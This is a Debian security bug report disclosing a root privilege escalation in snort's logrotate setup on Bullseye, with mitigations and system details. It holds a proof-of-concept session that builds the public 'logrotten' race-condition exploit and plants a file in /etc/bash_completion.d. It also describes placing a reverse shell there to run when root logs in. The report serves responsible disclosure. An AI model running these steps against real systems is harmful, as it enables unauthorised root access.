Bug#1009820: snort: Privilege escalation due to insecure use of logrotate

Mon, 18 Apr 2022 10:27:19 -0700 

Package: snort
Version: 2.9.15.1-5
Severity: critical
Tags: security upstream
Justification: root security hole
X-Debbugs-Cc: [email protected]

Dear Maintainer,

The path of the logdirectory of snort can be manipulated by user

Snort in Debian Bullseye:

# ls -ld /var/log/snort/
drwxr-s--- 3 snort adm 4096 Apr 14 08:44 /var/log/snort/
 

The files in /var/log/snort/*/*log are once a day rotated by

logrotate as user root with the following config:

/var/log/snort/snort.alert /var/log/snort/snort.alert.fast /var/log/snort/*log 
/var/log/snort/*/alert /var/log/snort/*/*log {
    daily
    rotate 7
    compress
    missingok
    notifempty
    create 0640 snort adm
    sharedscripts
    postrotate
        if [ -x /usr/sbin/invoke-rc.d ]; then \
            invoke-rc.d snort restart > /dev/null; \
        else \
            /etc/init.d/snort restart > /dev/null; \
        fi; 
    endscript
}

Due to logrotate is prone to a race-condition(see the link to my blog below) it 
is possible for user "snort" to replace or create any directory in 
/var/log/snort/ with a symbolik link to any

directory(for example /etc/bash_completion.d). logrotate will place files AS 
ROOT into /etc/bash_completition.d and set the owner and group to "snort.adm". 
An attacker could simply place a reverse-shell into this file. As soon as root 
logs in, a reverse shell will be executed then.

You can find an exploit for this bug at my blog: 
https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
 and https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition

Proof of Concept:
#################

snort@b8ff2e70f94d:~$ cd /tm

snort@b8ff2e70f94d:/tmp$ git clone https://github.com/whotwagner/logrotten.git
Cloning into 'logrotten'...
remote: Enumerating objects: 97, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 97 (delta 4), reused 7 (delta 2), pack-reused 87
Receiving objects: 100% (97/97), 419.77 KiB | 691.00 KiB/s, done.
Resolving deltas: 100% (41/41), done.
snort@b8ff2e70f94d:/tmp$ cd logrotten/
snort@b8ff2e70f94d:/tmp/logrotten$ gcc -o logrotten logrotten.c

snort@b8ff2e70f94d:/tmp/logrotten$ echo "hello world" > payload
snort@b8ff2e70f94d:/tmp/logrotten$ mkdir /var/log/snort/pwn
snort@b8ff2e70f94d:/tmp/logrotten$ vim /var/log/snort/pwn/pwnme.lo

snort@b8ff2e70f94d:/tmp/logrotten$ ./logrotten -p payload -c 
/var/log/snort/pwn/pwnme.log
Waiting for rotating /var/log/snort/pwn/pwnme.log...
Renamed /var/log/snort/pwn with /var/log/snort/pwn2 and created symlink to 
/etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!
snort@b8ff2e70f94d:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 8
-rw-r--r-- 1 root  root 439 Mar 10  2021 git-prompt
-r-xr-xr-x 1 snort adm   19 Apr 14 08:43 pwnme.log


Mitigation:
###########

You could mitigate the problem by changing the owner and group of 
/var/log/snort to root, or by using the "su option" in /etc/logrotate.d/snort.

Note: I also checked out the sources of the current snort(snort-2.9.19). The 
source archive contains a file "snort-2.9.19/rpm/snort.logrotate" with a very 
similar content.

I have tested this vulnerability on Debian Bullseye with the following snort 
version:

||/ Name           Version      Architecture Description
+++-==============-============-============-===========================================
ii  snort          2.9.15.1-5   amd64        flexible Network Intrusion 
Detection System


I also checked out Debian Buster and it has a different logrotate-config for 
snort which doesn't seem to be affected.


-- System Information:
Debian Release: 11.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 5.10.0-13-amd64 (SMP w/1 CPU thread)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_US:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages snort depends on:
ii  adduser                      3.118
ii  debconf [debconf-2.0]        1.5.77
ii  init-system-helpers          1.60
ii  libc6                        2.31-13+deb11u3
ii  libdaq2                      2.0.7-5
ii  libdumbnet1                  1.12-9
ii  liblzma5                     5.2.5-2
ii  libnetfilter-queue1          1.0.5-2
ii  libnghttp2-14                1.43.0-1
ii  libpcap0.8                   1.10.0-2
ii  libpcre3                     2:8.39-13
ii  libssl1.1                    1.1.1n-0+deb11u1
ii  logrotate                    3.18.0-2
ii  lsb-base                     11.1.0
ii  net-tools                    1.60+git20181103.0eebece-1
ii  rsyslog [system-log-daemon]  8.2102.0-2
ii  snort-common                 2.9.15.1-5
ii  snort-common-libraries       2.9.15.1-5
ii  snort-rules-default          2.9.15.1-5
ii  zlib1g                       1:1.2.11.dfsg-2+deb11u1

Versions of packages snort recommends:
ii  iproute2  5.10.0-4

Versions of packages snort suggests:
pn  snort-doc  <none>

-- debconf information:
* snort/interface: enp0s3
  snort/options:
  snort/invalid_interface:
  snort/please_restart_manually:
  snort/send_stats: true
  snort/disable_promiscuous: false
* snort/address_range: 192.168.0.0/16
  snort/stats_rcpt: root
  snort/startup: boot
  snort/stats_treshold: 1
  snort/config_parameters:

Reply via email to